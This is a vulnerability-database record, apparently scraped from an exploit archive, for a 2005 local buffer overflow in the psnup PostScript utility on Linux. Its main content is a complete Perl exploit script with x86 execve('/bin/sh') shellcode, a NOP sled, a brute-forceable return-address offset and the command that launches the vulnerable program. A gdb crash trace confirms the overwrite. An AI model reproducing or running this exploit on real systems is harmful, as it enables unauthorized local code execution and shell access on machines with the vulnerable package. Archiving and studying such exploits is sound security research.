Description
PostScript Utilities - psnup Local Buffer Overflow
{"lastseen": "2020-04-01T19:04:43", "references": [], "description": "\nPostScript Utilities - psnup Local Buffer Overflow", "edition": 1, "reporter": "lammat", "exploitpack": {"type": "local", "platform": "linux"}, "published": "2005-03-21T00:00:00", "title": "PostScript Utilities - psnup Local Buffer Overflow", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.1, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2005-03-21T00:00:00", "id": "EXPLOITPACK:81E0113E4419351DB6A4A66D558C2C61", "href": "", "viewCount": 5, "sourceData": "#!/usr/bin/perl\n\n# PostScript Utilities - psnup (all the utilities of the package are vulnerable) *\n# \t\t\t\t\t\t \t *\t\n# written by lammat just for practice purposes *\n# tested against psutils-p17 *\n# (gdb) r -8 `perl -e 'print \"A\"x250'` *\n# The program being debugged has been started already. *\n# Start it from the beginning? (y or n) y *\n# Starting program: /usr/bin/psnup -8 `perl -e 'print \"A\"x250'` *\n# (no debugging symbols found).../usr/bin/psnup: can't open input file *\n# AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.... *\n# *\n# Program received signal SIGSEGV, Segmentation fault. * \n# 0x41414141 in ?? () * \n\n# execve(/bin/sh) for linux x86\n# 29 bytes\n# by Matias Sedalo\n\n\n$shellcode = \n\"\\x31\\xdb\\x53\\x8d\\x43\\x17\\xcd\\x80\\x99\\x68\\x6e\\x2f\\x73\\x68\\x68\".\n\"\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\";\n\n$len = 250;\n$ret = 0xbffff3a0; \n$nop = \"\\x90\";\n$oops=\"/usr/bin/psnup\";\n$offset = 900; \n\n# offset bruteforce purposes below\nif (@ARGV == 1) {\n $offset = $ARGV[0];}\n\nfor ($i=0; $i<($len-length($shellcode)-100);$i++)\n\t{$buffer .= $nop;\n}\n\n$buffer .= $shellcode;\n\nprint (\"Address: 0x\",sprintf('%lx',($ret + $offset)),\"\\n\");\n\n$new_ret = pack('l',($ret + $offset));\n\nuntil(length($buffer)==$len)\n{\n$buffer.=$new_ret;\n}\nexec(\"$oops -8 $buffer\");\n\n# milw0rm.com [2005-03-21]", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645840388, "score": 1659814272}, "_internal": {"score_hash": "41d3b5ee27c497fca077f2aa61b95d0e"}}
{}